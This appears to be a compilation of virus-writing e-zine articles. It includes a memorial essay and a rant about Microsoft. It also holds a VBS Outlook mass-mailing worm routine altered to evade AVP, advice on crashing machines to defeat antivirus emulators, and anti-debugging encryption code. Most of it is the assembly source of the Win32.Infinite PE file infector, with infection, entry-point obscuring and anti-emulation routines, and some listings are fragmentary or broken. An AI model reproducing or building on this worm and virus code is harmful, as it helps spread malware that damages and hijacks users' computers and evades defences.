protectors are REALLY hard to crack; even really good crackers have problems with them.
Now I come to the point: what do you think, how many really good crackers are there among
AVers? Sure, they know debuggers and disassemblers, but that's not enough to be a good
cracker. What if some hard AD code, so hard that even the best crackers have problems with
it, were used in your virus? Wouldn't the AVer who gets a sample of it have some sad times,
sitting up all night trying to decrypt the virii? But how can a virus writer get this kind of
code? Luckily, exactly as in the viral business, there are many source codes available. And
there's also another reason to check out protectors: quite a lot of them check the
executable for changes. That's no problem when your virus is resident and has stealth
capabilities, but if you coded a runtime virii then you're fucked. This can be fixed by
adding code that prevents the virii from infecting protected files. Of course there's a third
reason: use the encryption routines of a protector for crypting the virus. Or you can
encrypt the file with this code and insert another decryptor, which decrypts your virii,
into the main decryptor. The main goal is that AVP, for example (it seems to be the AV which
can unpack the most executable compressors and decryptors), scans the file (finds no viral
infection), finds the protector, unpacks it, scans the unprotected file (and again finds no
virus). A (possibly) good example of the code produced by the protector scene are EliCZ's
device drivers, ExDs. They are VxDs that are executed in DOS, work their way up to ring 0
and stay there. Plus points: undetectable (or at least that's what EliCZ claims). Why can't
we use this technology in our virii? But check these things out yourself. You just need
access to the Internet and the following address: http://www.suddendischarge.com
Katja Kladnik (Lucky Lady)
Richard Karsmakers
Some of you will maybe remember me mentioning a girl from Slovenia by the name of Lucky Lady
who contacted me about 18 months ago for the first time. She has appeared in various
instalments of the ST NEWS virus column.
As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus
Killer", which had in some way caused her to start a kind of 'competition' with her
designing and spreading computer viruses and me trying to find and kill them. She sent me
each of her creations so that I could update the "Ultimate Virus Killer" recognition
algorithms. Although I certainly didn't approve of all these things she did nor the way she
involved me in it, all I could do was play along with the game. I couldn't contact her in
return, because she always sent her packages anonymously.
As 1994 was coming to its close, it became apparent that she had left the Atari community
and was now concentrating more on the PC side of things. Also, quite suddenly she contacted
me via electronic mail. Though I still didn't know her name, I could now at least send
messages back to her. Especially with her having left the Atari virus creation scene,
something happened which I had not considered possible: Our email messages became more
casual and even personal.
Gradually I found out that her real name was Katja Kladnik, who had lost her parents in the
Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster
parents and studied psychology at the University of Ljubljana, the capital of Slovenia. She
was - I know this may sound strange to some of you, especially those struck by any of the
viruses she has created - a really fascinating person who had a lot of hidden depths to her
personality. We exchanged email messages with quite some regularity, usually involving
topics like music, culture and, occasionally, viruses. I always wondered why she had found
it so challenging to create computer viruses and start this semi-friendly "virus war" with
me, a question that she could never really answer satisfactorily.
Around spring of this year I noticed her messages getting increasingly gloomy and
depressing. She even said, on several occasions, that she wouldn't mind being dead or
something. I never knew what triggered this doom and gloom, though it might have been her
boyfriend leaving her some time earlier. There was nothing I could do about it, either.
Believe me, I tried.
When I emailed her to ask how she was doing, somewhere around the middle of June, I got a
message back after a while from someone else who said that, on June 3rd, 11:53 CET, Katja
had died at Ljubljana's main hospital of an Atropine and Scopolamine overdose. Suicide, most
likely. She was 22.
Despite the fact that, in theory, Katja "Lucky Lady" Kladnik had started off as something
like an enemy, in the course of our correspondence she had become a kind of friend.
Especially after she had left the Atari scene, we opened up to each other and I no longer
felt that being in contact with her was in some way morally incorrect what with my being a
virus killer programmer and her a (by then ex-) Atari virus coder. During the last one or
two months she was to me not a virus coder at all, but instead a sad young woman that needed
attention and love badly.
Katja, despite the fact that we started off on a really wrong foot, you will be on my mind
always; not as a virus coder but as the enchanting and fascinating friend that you gradually
became.
Anti Avp Vbs I-Worms Detection
[K]Alamar
In one of its latest updates, the AVP antivirus added detection for I-Worms that use the
Outlook replication method, which is used in almost all VBS and JS worms, like ILOVEYOU,
BubbleBoy and all of them.
OK, this will make your I-Worm undetectable by AVP till they add it to the database; I'm
pretty sure that if your worm uses Outlook replication, you use this code or one
similar:
---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---
The only thing you should do is add one line and change another, like here (lines with *
are the modified ones):
---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
AddlistCount = AddList.AddressEntries.Count *
For AddListCount = 1 To AddlistCount *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---
You should delete the "*" if you want the worm to work.
I think that if you know something about I-Worms you should understand what I did: I just
create a new variable, AddlistCount, make it equal to the number of AddressEntries, and
then use that new variable in the next line.
Retro the easy way
MidNyte
What is a Retro-virus?
-------------------------
You remember reading that a good emulator will save its place when it
finds a decision-based jump? That way, if the code checks something
and then quits if the condition is met, the emulator can just go back,
pretend the condition wasn't met and see what it can find down the other
branch of the program. This is to defeat the technique of quitting when
finding an emulator. How about we stop that? How about we do our
anti-emulation bit and then test it, but if we're being emulated, instead of
just quitting, we crash the program? Or better still, if we're on a Pentium,
why not just hang the machine? It's what the 'F00F' bug is there for :) If the
machine hangs, the antivirus program has no chance to return to the jump and
try the other branch, and the user will probably not bother scanning it again.
If he does, the same thing will happen again and again; the user will never
get a complete scan. Here's a rough guide to the code needed, assuming that
you have in place a suitable emulation-detection routine:
How many end users are going to restart the computer and try scanning that
file again when the last time it hung the computer? In the Microsoft age of
idiot-friendly operating systems, not many. If they don't know what's going on
and the machine hangs, they just won't do it again. If they do it once, they
won't do it twice. Take the virus hoax emails that constantly do the rounds: most
people know better than to respond and forward the mail, but the fact that they
carry on spreading shows just how many idiots there are out there who are
capable (just about) of using a computer. These are the people who will not
scan your file but simply add it to the ignore list, leaving it to go about
its business.
Another method is the time-wasting method. Again it's down to annoying the
user so much they don't bother scanning. If you can go round enough loops when
you find emulation that the scanner takes minutes just to scan one file, the
scanner will probably only be run overnight and taken off constant background
monitoring. That gives you a day to spread, and spread unnoticed.
Contact
----------
How to become the world's richest man
MidNyte
Microsoft are rumoured to have stated that they will use unlimited
resources and funds to find the author of the VBS/Monopoly worm. The worm
carries a message accusing Bill Gates of monopoly and includes a satirical
picture of Bill Gates' head on the Waddingtons character featured on a
Monopoly board. This particular worm is much less of a security risk to the
user than other viruses. Surely everyone can see this is a case of a bruised
millionaire's ego? Why does no-one point out to Bill that the worm spreads
through the almost unbelievable lack of security that Microsoft products
offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your
defective products? Why not, Trading Standards, make him make his product do
what it claims to do, and while you're at it, make him either make it secure
or make him warn people of the security risk? This is the world's richest man,
who owns one of the world's biggest companies, and that is how he got rich: by
writing a half-product and managing to sell it for a huge price. Money that
should have gone into making the products what they claimed to be went into
Bill's back pocket instead. We now have proof in this retaliation to a simple
worm that to Bill Gates, his ego is worth billions, his customers are not. The
virus didn't prove your guilt, Bill, it didn't need to. Your reaction
leaves us in no doubt.
--==< An Introduction to Encryption, Part III >==--
First of all came the unencrypted virus. Then came virus scanners, which
were basically just hex searchers looking for strings of hex found only in
certain viruses. Viruses retaliated by coming up with encryption. Most of the
virus is encrypted, and a small decryption routine at the start of the virus
decrypts the virus body. As the encryption changes each time, the virus
scanner is limited to searching for a much smaller section of code inside the
constant decryptor. This wasn't much of a problem for virus scanners though.
Viruses fought back again with polymorphism; this is essentially a way for a
virus to change its decryptor every time it infects a new file. That way no
constant strings appear in the virus. Virus scanners came up with two ways to
combat this, heuristics and emulation. Heuristics is simply looking for code
that looks 'virus-like'. This can be something as simple as the string '*.exe'.
Emulation is the controlled running of the program instruction by instruction
(not quite, but close enough for this article). A virus, under emulation, will
be allowed to run just enough to decrypt itself and reveal its code for
either a straightforward scan or a generic (heuristic) scan. Anti-emulation is
the virus's way of defeating this; it is basically a way to detect emulation
in progress and act accordingly. Some anti-emulation systems are incorporated
into the decryptor of a virus, so that if the virus is being emulated it will
not decrypt properly and hence not reveal its code. Another defence the virus
can use is anti-debugging, which is designed to hinder people who try to debug
(in this case decrypt) the code. This is different in that it doesn't
defend the virus from antivirus programs; it defends it from the antivirus
companies, the people who will try to study the virus and work out a way to
detect it. Anti-debugging can be very simple, like turning off the keyboard
interrupt at the start of the code and back on again at the end, or it can be
quite complicated, with the actual anti-debugging routine also being used as a
key for decryption to protect against patching. This is the focus of this
article.
in al, 020h ; \
or al, 002h ; }Disable keyboard interrupt (port 20h as in the original
out 020h, al ; / listing; the 8259A's IRQ mask register is actually port 21h)
in al, 020h ; \
and al, 0FDh ; }Enable keyboard interrupt (FDh = NOT 2)
out 020h, al ; /
...at the end. When the virus is run under normal conditions, the keyboard
is only off for a very short time, too short for people to notice. If the
program is running under a debugger, as soon as the first few instructions are
run the keyboard will no longer work, leaving the person at the debugger with
no choice but to reset (at least that's how it used to be in the good old days :) The
simple workaround for the person debugging was to simply patch over the code
that turned off the keyboard with NOPs or other do-nothing instructions. Now
the virus would work as normal under a debugger, without disabling the
keyboard. To retaliate against this, viruses started to use their anti-debugging
routine as a key for decryption. The hex string to turn off the keyboard is
'E4 20 0C 02 E6 20'. If this is one of the decryption keys, the person
debugging cannot just replace the instructions with NOPs, as this would
change the key to '90 90 90 90 90 90' and cause the virus to decrypt
incorrectly. This seems like an ideal solution, but unfortunately it is not.
The whole point of this article is to point out the following fact: any
decryption routine can have its basic functionality copied by someone
determined to debug it. This means that your routine that uses an
anti-debugging routine and also uses that routine as a key for further
decryption could be useless. Let's go through it with an example. The original
virus looks like this:
start:
in al, 020h ; \
or al, 002h ; }Disable keyboard interrupt
out 020h, al ; /
xor si,si ; key index, relative to start
mov bx, offset encrypted ; BB xx xx - first word to decrypt
mov cx, offset virus_end ; B9 xx xx
sub cx,bx ; 2B CB - length in bytes ...
shr cx,1 ; D1 E9 - ... and in words
decrypt:
mov ax, word ptr [start+si]
xor [bx],ax
inc bx ; advance to the next ciphertext word
inc bx ; (missing from the original listing)
inc si
cmp si, decrypt-start ; wrap when the key (start..decrypt) is used up
jne next_key_word
xor si,si
next_key_word:
loop decrypt
encrypted:
; ... encrypted virus body follows ...
virus_end:
The pointer to the relevant word of the decryption key is kept in si, which
means that the key is all the code from 'start:' to 'decrypt:'. This works out
as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard
part was NOPped out, the key would change to '90 90 90 90 90 90 33 F6 BB 19 01
B9 36 01 2B CB D1 E9', as we've already seen. What the person doing the
debugging can do, though, is simply take the encrypted portion of the virus
and put it into his own program, only this time the key is stored as
data, not as an executable part of the program, like this:
start:
xor si,si
mov bx, offset encrypted ; the ciphertext lifted from the sample
mov cx, offset encrypted_end
sub cx,bx
shr cx,1
decrypt:
mov ax, word ptr [key+si]
xor [bx],ax
inc bx
inc bx
inc si
cmp si, key_end-key ; wrap after the last key byte
jne next_key_word
xor si,si
next_key_word:
loop decrypt
; decrypted bytes are now at encrypted: and can be dumped
key:
db 0E4h, 020h, 00Ch, 002h, 0E6h, 020h ; the key as data, not code
db 033h, 0F6h, 0BBh, 019h, 001h, 0B9h, 036h, 001h, 02Bh, 0CBh, 0D1h, 0E9h
key_end:
db 08Bh ; the byte that followed the key in the original (first opcode byte
; of 'mov ax, word ptr [start+si]'); the last key word straddles it
encrypted:
; ... the encrypted bytes copied out of the sample go here ...
encrypted_end:
As you can see, the above will decrypt the encrypted section in exactly the
same manner, only because the key is stored as data we can change the code as
much as we like.
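The same lift in C, as an added example that is not part of the original article: the key is carried as data, the decryptor's sliding-word XOR is reproduced, and the two outcomes the article describes are checked side by side (the lifted key restores the plaintext; the NOP-patched key does not). The 18 key bytes are the ones derived above; the appended 19th byte, 8Bh, is the first opcode byte of "mov ax, word ptr [start+si]" and is derived from the listing rather than printed on the page. The plaintext is a constructed sample.

```c
/* Added example, not from the original article: a C re-implementation of the
 * decryptor above with the key held as DATA, which is the lift an analyst
 * performs. One byte is appended to the 18-byte key because the asm reads a
 * 16-bit word at key[si] and wraps si at 18, so at si == 17 the word also
 * covers the byte that follows the key: in the virus that is the first
 * opcode byte of the decrypt loop, 8Bh for "mov ax, word ptr [start+si]"
 * (derived from the listing, not printed on the page). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define KEY_LEN 18
static const uint8_t KEY_CODE[KEY_LEN + 1] = {
    0xE4, 0x20, 0x0C, 0x02, 0xE6, 0x20,   /* in al,20h / or al,2 / out 20h,al */
    0x33, 0xF6,                           /* xor si,si                        */
    0xBB, 0x19, 0x01, 0xB9, 0x36, 0x01,   /* mov bx,0119h / mov cx,0136h      */
    0x2B, 0xCB, 0xD1, 0xE9,               /* sub cx,bx / shr cx,1             */
    0x8B                                  /* first byte of the decrypt loop   */
};

/* Mirror of the loop: XOR word i of buf with the 16-bit window at key[si],
 * advancing si one BYTE per word and wrapping it at key_len. XOR is its own
 * inverse, so the same call both encrypts and decrypts. */
void xor_sliding_key(uint8_t *buf, size_t words,
                     const uint8_t *key, size_t key_len)
{
    size_t si = 0;
    for (size_t i = 0; i < words; i++) {
        uint16_t k = (uint16_t)(key[si] | (key[si + 1] << 8)); /* [key+si] */
        buf[2 * i]     ^= (uint8_t)(k & 0xFF);
        buf[2 * i + 1] ^= (uint8_t)(k >> 8);
        if (++si == key_len)                                   /* cmp si,len */
            si = 0;                                            /* xor si,si  */
    }
}

/* 1 if the seam word at si == 17 is E9h | 8Bh << 8 and the window then
 * wraps to the first key word, i.e. the lifted key must carry byte 19. */
int seam_is_covered(void)
{
    uint8_t z[40] = {0};
    xor_sliding_key(z, 20, KEY_CODE, KEY_LEN);
    return z[34] == 0xE9 && z[35] == 0x8B && z[36] == 0xE4 && z[37] == 0x20;
}

/* Encrypt a constructed plaintext the way the virus would, then decrypt it
 * (a) with the key lifted as data and (b) with the key after the six PIC
 * bytes were NOPped out. Returns 1 if (a) restores the text and (b) does not:
 * patching the code breaks the key, lifting it as data does not. */
int key_as_data_demo(void)
{
    static const char plain[12] = "*.COM *.EXE";   /* constructed sample */
    uint8_t cipher[12], a[12], b[12], nopped[KEY_LEN + 1];

    memcpy(cipher, plain, sizeof cipher);
    xor_sliding_key(cipher, 6, KEY_CODE, KEY_LEN);  /* what the virus did   */

    memcpy(a, cipher, sizeof a);
    xor_sliding_key(a, 6, KEY_CODE, KEY_LEN);       /* key as data          */

    memcpy(nopped, KEY_CODE, sizeof nopped);
    memset(nopped, 0x90, 6);                        /* debugger's NOP patch */
    memcpy(b, cipher, sizeof b);
    xor_sliding_key(b, 6, nopped, KEY_LEN);

    return memcmp(a, plain, 12) == 0 && memcmp(b, plain, 12) != 0;
}
```

The seam check is the detail that bites when lifting code-as-key schemes by hand: copying exactly the bytes between 'start:' and 'decrypt:' is one byte short, because the last 16-bit read overlaps the instruction that follows the key.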
Conclusion
-------------
Contact
----------
Comments/questions/suggestions/bug reports/etc. are welcomed as always, as
long as it is kept reasonable.
- MidNyte
; ╔══════════════════════════════════════════════════════════════╗
; ║ Win32.Infinite (c) 2000 Billy Belcebu/iKX                    ║
; ╚══════════════════════════════════════════════════════════════╝
virus_start:
; ╔══════════════════════════════════════════════════════════════╗
; ║ Virus code                                                   ║
; ╚══════════════════════════════════════════════════════════════╝
infinite:
push eax ; Make some space on stack
pushad
call decrypt
encrypt_start = $
call get_delta
lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetWindowsDirectoryA
call SetDir&Infect
lea edi,[ebp+infect_dir-delta]
push 7Fh
push edi
apicall GetSystemDirectoryA
call SetDir&Infect
lea edi,[ebp+current_dir-delta]
push edi
apicall SetCurrentDirectoryA
call Seek&Infect
; Now let's unprotect the memory where the epo bytes will be restored
RestoreSEH:
xor edx,edx ; Restore the original SEH
pop dword ptr fs:[edx]
pop edx
call over0
sebes db epo_bytes dup (90h)
over0: pop esi
push epo_bytes
pop ecx
rep movsb
popad
ret
; ╔══════════════════════════════════════════════════════════════╗
; ║ Mark of the virus                                            ║
; ╚══════════════════════════════════════════════════════════════╝
; ╔══════════════════════════════════════════════════════════════╗
; ║ Search for files to infect                                   ║
; ╚══════════════════════════════════════════════════════════════╝
SetDir&Infect:
lea edi,dword ptr [ebp+infect_dir-delta]
push edi
apicall SetCurrentDirectoryA
Seek&Infect:
lea eax,[ebp+WFD-delta] ; Search for files
push eax
call over3
db "*.*",0 ; Search for all files
over3: apicall FindFirstFileA
inc eax
jz FailOccured
SearchForMore:
push dword ptr [ebp+modbase-delta] ; Preserve untouchable info
push dword ptr [ebp+rethost-delta]
call InfectPE
NotThisTime:
pop dword ptr [ebp+rethost-delta] ; Restore this interesting
pop dword ptr [ebp+modbase-delta] ; info
CloseSearchHandle:
push dword ptr [ebp+SearchHandle-delta]
apicall FindClose
FailOccured:
ret
ProcessExtension:
; input:
; EDI - Pointer to file name
; output:
; ECX - NULL if it is not an extension; 1 if it is.
dec edx
ItWasExtension:
inc edx
mov ecx,edx
ret
; ╔══════════════════════════════════════════════════════════════╗
; ║ PE Infection Engine                                          ║
; ╚══════════════════════════════════════════════════════════════╝
InfectPE:
; input:
; EDI - Pointer to filename to infect
; output:
; Nothing.
NotInWin2k:
push 80h ; Destroy hostile attributes
push edi ; and put normal ones
apicall SetFileAttributesA
inc eax
jz ExitInfectPE
dec eax
push 00h
push eax
apicall GetFileSize ; Get its size
mov dword ptr [ebp+OriginalSize-delta],eax
or eax,eax
jz CloseFileExitInfectPE
xor ebx,ebx
push 00h ; We want map only file size
push ebx
push ebx
push 02h
push eax
apicall MapViewOfFile
or eax,eax
jz UnMap&CloseMap&FileExitInfectPE
mov edi,esi
add esi,0F8h-28h ; Pointer to 1st section-28h
NextSection: add esi,28h ; Ptr to section name ;)
mov edx,eax ; Put in EDX the original EIP
sub edx,[esi.VirtualAddress] ; Remove the VirtualAddress
cmp edx,[esi.VirtualSize] ; Is EIP pointing to this sec?
jae NextSection ; If not, loop again
pushad
push dword ptr [esi.SizeOfRawData] ; Some tricky thing :)
pop dword ptr [esi.VirtualSize]
mov eax,[ebp+rethost-delta]
add eax,ebx
mov dword ptr [ebp+tempshit-delta],eax
popad
add ebx,[esi.PtrToRawData]
add edx,ebx
mov esi,edx ; ESI - Pointer to section
mov dword ptr [ebp+EPofs-delta],esi ; mapped in mem where da EP is.
pushad
sub eax,dword ptr [ebp+MapAddress-delta]
mov esi,dword ptr [ebp+PtrPEH-delta]
mov edi,esi ; We wanna put some attribs
add esi,0F8h-28h ; to the section where the
NextSection2: add esi,28h ; virus code is located, so
mov edx,eax ; we've to search for it :)
sub edx,[esi.VirtualAddress]
cmp edx,[esi.VirtualSize]
jae NextSection2
; Let's check if we can put ourselves inside the hole (more security)
mov edx,[esi.VirtualAddress]
add edx,[esi.VirtualSize]
add eax,((heap_end-virus_start)+security)
sub edx,eax
js wecantinfectthere
mov dword ptr [ebp+inf_switch-delta],01h
or [esi.Characteristics],0A0000020h ; PUT IT SUCKA!
wecantinfectthere:
popad
mov ecx,12345678h
org $-4
inf_switch dd ?
or ecx,ecx
jz Trunc&UnMap&CloseMap&FileExitInfectPE
lea esi,[ebp+virus_start-delta]
mov edi,eax
add edi,security ; Some security :)
pushad
mov eax,12345678h ; Let's calculate where the
tempshit = $-4 ; jmp must point to
add eax,(killemu-epo)
sub edi,eax
mov dword ptr [ebp+jmpadd-delta],edi
popad
mov ecx,virus_size
rep movsb
pushad
sub edi,virus_end-encrypt_start
mov esi,edi
call random
mov bl,al
mov byte ptr [edi+enc_key-encrypt_start],bl
mov byte ptr [ebp+enc_k3y-delta],bl
mov ecx,encrypt_end-encrypt_start
enc_l00p:
lodsb
xor al,bl
stosb
loop enc_l00p
popad
pushad
sub edi,(virus_size-(sebes-virus_start))
mov esi,dword ptr [ebp+EPofs-delta]
push epo_bytes
pop ecx
pushad
lewpit:
lodsb ; Store EPO bytes also
xor al,00h ; encrypted
enc_k3y = $-1
stosb
loop lewpit
popad
xchg edi,esi
call over69
;──────────────────────────────────┐
epo: call killemu ;│ This code will give the control to the
mov esp,[esp+08h] ;│ virus and avoid the scanning of emulators
xor edx,edx ;│ at the same time :)
pop dword ptr fs:[edx];│
pop edx ;│
db 0E9h ;│
jmpadd: dd ? ;│
killemu:xor edx,edx ;│
push dword ptr fs:[edx];│
mov fs:[edx],esp ;│
div edx ;│
epo_bytes = $-epo ;│
;──────────────────────────────────┘
rep movsb
popad
add esi,58h
cmp dword ptr [esi],00h
jz Trunc&UnMap&CloseMap&FileExitInfectPE
ThereWasNoHole:
Trunc&UnMap&CloseMap&FileExitInfectPE:
UnMap&CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapAddress-delta]
apicall UnmapViewOfFile
CloseMap&FileExitInfectPE:
push dword ptr [ebp+MapHandle-delta]
apicall CloseHandle
CloseFileExitInfectPE:
push dword ptr [ebp+FileHandle-delta]
apicall CloseHandle
ExitInfectPE:
ret
SeekForHoles:
; input:
; ESI - Pointer inside file (in PE header)
; ECX - How many space do we need
; EBX - Search limit
; output:
; EAX - Pointer to the beginning of the shit
; CF - Set if error (couldn't find hole)
call SetSEH1
mov esp,[esp+08h] ; Just for security of
call get_delta ; scanning :)
jmp NSE_
SetSEH1:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
push esi
GetAnotherByte:
xor edx,edx ; Clear counter :)
GAB2: dec ebx ; Check if we arrived until
jz NoShitEnough ; the limit (run away if so)
lodsb
or al,al ; NULL byte?
jz IsFillByte
cmp al,0CCh ; Int 3? (VC6 filez're full
jnz GetAnotherByte ; of them)
IsFillByte:
inc edx ; Increase counter
cmp ecx,edx
jnz GAB2
WeFoundManyShit:
sub esi,ecx ; ESI = Point to shit
xchg eax,esi
pop esi
pop dword ptr fs:[00h]
pop edx
ret
NoShitEnough:
pop esi
NSE_: stc
pop dword ptr fs:[00h]
pop edx
ret
; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                         APICRC32 Search Engine                          ║
; ╚═════════════════════════════════════════════════════════════════════════╝
GetAPIs proc
; input:
; EAX - Base address of the library in which to search for the APIs
; ESI - Pointer to an array of CRC32s of the APIs we want to find
; EDI - Pointer to where the API addresses are stored
; output:
; Nothing.
pop eax
jmp GetAPIs
EndOfAPISearch:
ret
GetAPIs endp
GetAPI_ET_CRC32 proc
; input:
; EAX - CRC32 of the API whose address we want
; output:
; EAX - API address, NULL if error
xor edx,edx
pushad
call over_APICRC32_SEH
mov esp,[esp+08h] ; Set stack as before
xor eax,eax ; signal the error
jmp Remove_APICRC32_SEH
over_APICRC32_SEH:
push dword ptr fs:[edx] ; Set new SEH frame
mov dword ptr fs:[edx],esp
push 1Ch
pop esi
add esi,[eax+78h] ; Get a pointer to its edata
add esi,[ebp+TmpModuleBase-delta]
Remove_APICRC32_SEH:
xor edx,edx ; Remove that SEH frame
pop dword ptr fs:[edx]
pop edx
mov [esp.1Ch],eax
popad
ret
GetAPI_ET_CRC32 endp
; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                               Subroutines                               ║
; ╚═════════════════════════════════════════════════════════════════════════╝
CRC32:
; input:
; ESI - Pointer to the data to process
; EDI - Size of such data
; output:
; EAX - CRC32 of that data
cld
pushad
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
xchg eax,edx
rol eax,10h
mov ax,cx
mov [esp.PUSHAD_EAX],eax
popad
ret
CheckImageBase:
; input:
; ESI - Address inside module
; ECX - Limit
; output:
; ESI - module address
and esi,0FFFF0000h
cmp word ptr [esi],"ZM"
jz ItWasKewlEnough
NotCoolAddress:
sub esi,00010000h
loop CheckImageBase
ItWasKewlEnough:
ret
random:
; input:
; Nothing.
; output:
; EAX - Random number
apicall GetTickCount
xor eax,12345678h
org $-4
seed dd -1
mov dword ptr [ebp+seed-delta],eax
ret
get_delta:
call delta ; Get a relative address from
delta: pop ebp ; which to calculate offsets
ret
; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                               Virus Data                                ║
; ╚═════════════════════════════════════════════════════════════════════════╝
api_list = $
; db "KERNEL32",0 ; Not needed
@VirtualProtect dd 079C3D4BBh
@FindFirstFileA dd 0AE17EBEFh
@FindNextFileA dd 0AA700106h
@FindClose dd 0C200BE21h
@CreateFileA dd 08C892DDFh
@SetFileAttributesA dd 03C19E536h
@CloseHandle dd 068624A9Dh
@GetCurrentDirectoryA dd 0EBC6C18Bh
@SetCurrentDirectoryA dd 0B2DBD7DCh
@GetWindowsDirectoryA dd 0FE248274h
@GetSystemDirectoryA dd 0593AE7CEh
@CreateFileMappingA dd 096B2D96Ch
@MapViewOfFile dd 0797B49ECh
@UnmapViewOfFile dd 094524B42h
@SetEndOfFile dd 059994ED6h
@GetFileSize dd 0EF7D811Bh
@SetFilePointer dd 085859D42h
@GetSystemTime dd 075B7EBE8h
@LoadLibraryA dd 04134D1ADh
@FreeLibrary dd 0AFDF191Fh
@GlobalAlloc dd 083A353C3h
@GlobalFree dd 05CDF6B6Ah
@WriteFile dd 021777793h
@GetProcAddress dd 0FFC97C1Fh
@GetTickCount dd 0613FD7BAh
db 0BBh
db "IMAGEHLP",0
@CheckSumMappedFile dd 078B31744h
db 0BBh
db "SFC",0
@SfcIsFileProtected dd 06DE8F7ABh
db 0BBh
db "DC4"
encrypt_end = $
; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                        Simple decryption l00p :)                        ║
; ╚═════════════════════════════════════════════════════════════════════════╝
decrypt:
pop esi
mov edi,esi
mov ecx,encrypt_end-encrypt_start
mov bl,00h
enc_key = $-1
dec_l00p:
lodsb
xor al,bl
stosb
loop dec_l00p
jmp encrypt_start
virus_end = $
; ╔═════════════════════════════════════════════════════════════════════════╗
; ║                         Virus Data in the heap                          ║
; ╚═════════════════════════════════════════════════════════════════════════╝
kernel dd ?
TmpModuleBase dd ?
AddressTableVA dd ?
NameTableVA dd ?
OrdinalTableVA dd ?
OriginalSize dd ?
SearchHandle dd ?
FileHandle dd ?
MapHandle dd ?
MapAddress dd ?
PtrPEH dd ?
EPofs dd ?
api_addresses = $
; KERNEL32 APIs
VirtualProtect dd ?
FindFirstFileA dd ?
FindNextFileA dd ?
FindClose dd ?
CreateFileA dd ?
SetFileAttributesA dd ?
CloseHandle dd ?
GetCurrentDirectoryA dd ?
SetCurrentDirectoryA dd ?
GetWindowsDirectoryA dd ?
GetSystemDirectoryA dd ?
CreateFileMappingA dd ?
MapViewOfFile dd ?
UnmapViewOfFile dd ?
SetEndOfFile dd ?
GetFileSize dd ?
SetFilePointer dd ?
GetSystemTime dd ?
LoadLibraryA dd ?
FreeLibrary dd ?
GlobalAlloc dd ?
GlobalFree dd ?
WriteFile dd ?
GetProcAddress dd ?
GetTickCount dd ?
; IMAGEHLP APIs
CheckSumMappedFile dd ?
; SFC APIs
SfcIsFileProtected dd ?
; Other data
virseg ends
end infinite
;****************************************************************************
;** This is the include file for the constant and macros of the virus **
;****************************************************************************
; Constants
virus_size = virus_end-virus_start
total_size = heap_end-virus_start
inf_mark = "AIAG"
PUSHAD_EDI = 00h
PUSHAD_ESI = 04h
PUSHAD_EBP = 08h
PUSHAD_ESP = 0Ch
PUSHAD_EBX = 10h
PUSHAD_EDX = 14h
PUSHAD_ECX = 18h
PUSHAD_EAX = 1Ch
MagicPE = 00h
Machine = 04h
NumberOfSections= 06h
EntrypointRVA = 28h
CodeRVA = 2Ch
FileAlignment = 3Ch
MagicInfection = 4Ch
SizeOfImage = 50h
CheckSum = 58h
PECharacteristics= 5Eh
DirEntryReloc = 0A0h
SectionName = 00h
VirtualSize = 08h
VirtualAddress = 0Ch
SizeOfRawData = 10h
PtrToRawData = 14h
PtrToReloc = 18h
NumOfReloc = 20h
Characteristics = 24h
; Macros
; Structures
WIN32_FIND_DATA struc
dwFileAttributes dd ?
ftCreationTime dq ?
ftLastAccessTime dq ?
ftLastWriteTime dq ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
szFileName db 260 dup (?)
szAlternateFileName db 13 dup (?)
db 03 dup (?)
WIN32_FIND_DATA ends
;****************************************************************************
;** This is the host for the first generation **
;****************************************************************************
.586p
.model flat,stdcall
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
szTtl db "Win32.Infinite",0
szMsg db "Size "
db virus_size/1000 mod 10 + "0"
db virus_size/0100 mod 10 + "0"
db virus_size/0010 mod 10 + "0"
db virus_size/0001 mod 10 + "0"
db " - "
db "Virtual "
db total_size/1000 mod 10 + "0"
db total_size/0100 mod 10 + "0"
db total_size/0010 mod 10 + "0"
db total_size/0001 mod 10 + "0"
db 10,"(c) 2000 Billy Belcebu/iKX",0
_DATA ends
virus_init proc
jmp virus_start
host:
db epo_bytes dup (90h)
